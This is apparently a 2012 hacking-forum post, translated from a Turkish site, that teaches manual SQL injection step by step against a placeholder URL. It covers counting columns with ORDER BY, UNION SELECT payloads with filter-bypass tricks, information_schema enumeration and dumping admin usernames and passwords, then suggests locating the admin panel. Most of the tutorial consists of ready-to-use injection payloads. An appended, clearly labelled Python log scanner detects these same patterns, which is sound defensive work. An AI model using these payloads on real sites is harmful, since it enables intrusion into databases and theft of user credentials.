- 19 Oct 2012
// This article is for educational purposes only. Responsibility belongs to the user.
Manual SQL Hacking
Attack steps:
1) First, we will learn the number of columns.
2) We will reflect the columns.
3) We will get the names of the tables.
4) We will take what we want from the tables.
Step 1:
Site: examplesite.com/index.php?id=30
End of the address: (order+by+number-) (Don't forget the - symbol.)
Code:
>> examplesite.com/index.php?id=30+order+by+29-
If we see an error like this,
Error: Unknown column 10 in order clause
>> The number of columns is less than 29. We will reduce it step by step.
>> order+by+28-, order+by+27-, order+by+26-: we reduce it until the web site goes back to normal.
>> order+by+25- (If the web site returns to normal at 25, this means our column count is 25.)
Step 2:
We will append (+union+select+columns-) to the end of the URL. (We add - at the end. Don't forget it.)
Code:
www.examplesite.com/index.php?id=30 End of URL
Code:
www.examplesite.com/index.php?id=30+union+select+1+2+3+4+5+...23+24+25-
Now some numbers will appear on the screen. We will choose one of them and continue. If no numbers appear, we need a bypass.
>> Bypass
Code:
1) Normal: +union +select+1,2,3,4,5,6,7,25
Bypass: +/*!union*/+/*!select*/+1,2,3,4,5,6,7,25
2) Normal: +union +select+1,2,3,4,5,6,7,25
Bypass: +union +(select+1,2,3,4,5,6,7,25)
3) Normal: +union +select+1,2,3,4,5,6,7,25
Bypass: +#union# +#select#+1,2,3,4,5,6,7,25
Step 3:
Choose one of the numbers that appeared on the screen. For example 10.
We learn the name of the database with this command.
Code:
A-) www.examplesite.com/index.php?id=30+union+select+1,2,database(),3,4,5,6,7,8,..,24,25-
We learn the version of the database with this command.
Code:
B-) www.examplesite.com/index.php?id=30+union+select+1,2,version(),3,4,5,6,7,8,..,24,25-
Code:
C-) www.examplesite.com/index.php?id=30+union+select+1,2,group_concat(table_name),4,5,6,7,8,...,24,25+from+information_schema.tables-
information_schema.tables = Shows the names of the tables in the database.
>> Then we write this instead of schema.tables:
information_schema.columns = Shows the names of the columns in the database.
We learn the names of the tables with this command. Send this command, and the table names will appear on the screen.
Code:
D-) www.examplesite.com/index.php?id=30+union+select+1,2,group_concat(table_name),4,5,...,24,25+from+information_schema.tables+where+tables_schema=database()
Example table names: admin, places, activities
We will pay attention to admin.
Step 4:
- We will take the data of admin.
Code:
www.examplesite.com/index.php?id=30+union+select+1,2,group_concat(CoLumn_Name),4,5,6,7,8+from+information_schema.CoLumns+where+TabLeS_schema=database()+and+TabLe_Name=admin
After sending this command, we'll learn the names of the columns in the table.
Example: User
Password
E-mail
Phone number
We need User and Password.
We *******ing the page with writing this code.
Code:
www.examplesite.com/index.php?id=30+union+select+1,2,group_concat(user,password),4,5,6,7,8+from+admin
And the user and password data will appear on the screen.
Finally, you must find the admin panel. You can use Intelli Tamper for this.
Source user: AquieLL
This is a part of this Turkish article: http://www.turkhackteam.org/web-ser...um-yontemler-manuel-havij-sqlmap-aquiell.html
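Seen from the defending side, the requests in the steps above (ORDER BY values stepped down by one client, UNION SELECT with comment, parenthesis or # padding, information_schema lookups) stand out in web server access logs. The following Python script is an added example, not part of the original post: it normalizes each query string so the "Bypass" variants match the same rules as the plain form. The log line format, IP addresses, rule names and sweep threshold are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines (documentation IP ranges, the page's example URL shape).
SAMPLE_LOG = [
    '198.51.100.4 "GET /shop.php?sort=price&order=asc HTTP/1.1" 200',
    '203.0.113.7 "GET /index.php?id=30+order+by+29- HTTP/1.1" 500',
    '203.0.113.7 "GET /index.php?id=30+order+by+28- HTTP/1.1" 500',
    '203.0.113.7 "GET /index.php?id=30+order+by+25- HTTP/1.1" 200',
    '203.0.113.7 "GET /index.php?id=30+/*!union*/+/*!select*/+1,2,3- HTTP/1.1" 200',
    '203.0.113.9 "GET /index.php?id=30+union+(select+1,2,database(),4) HTTP/1.1" 200',
    '203.0.113.9 "GET /index.php?id=30+%23union%23+%23select%23+1,2 HTTP/1.1" 200',
]

LINE = re.compile(r'^(\S+) "GET \S+?\?(\S*) HTTP/[\d.]+" \d{3}$')
RULES = {  # \W+ between keywords absorbs spaces, parentheses and '#' padding
    "order_by_probe": re.compile(r"\border\W+by\W+(\d+)"),
    "union_select": re.compile(r"\bunion\W+(?:all\W+)?select\b"),
    "schema_enum": re.compile(r"\binformation_schema\W+(?:tables|columns)\b"),
    "db_fingerprint": re.compile(r"\b(?:database|version)\s*\(\s*\)"),
}

def normalize(query):
    """Decode the query string and unwrap MySQL comment padding before matching."""
    s = unquote_plus(unquote_plus(query)).lower()  # '+', %xx and double encoding
    s = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", s)     # /*!union*/ executes its contents
    s = re.sub(r"/\*.*?\*/", " ", s)               # plain comments are only padding
    return re.sub(r"\s+", " ", s)

def scan(lines, sweep_threshold=3):
    """Return {client_ip: sorted rule names}, adding 'column_count_sweep' per client."""
    hits, order_values = defaultdict(set), defaultdict(set)
    for m in filter(None, map(LINE.match, lines)):
        ip, query = m.group(1), normalize(m.group(2))
        for name, rx in RULES.items():
            if (found := rx.search(query)):
                hits[ip].add(name)
                if name == "order_by_probe":
                    order_values[ip].add(int(found.group(1)))
    for ip, values in order_values.items():
        if len(values) >= sweep_threshold:  # one client stepping through N values
            hits[ip].add("column_count_sweep")
    return {ip: sorted(rules) for ip, rules in hits.items()}

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

Rules like these only flag requests for review; binding `id` as a typed parameter in a prepared statement is what removes the injection point itself.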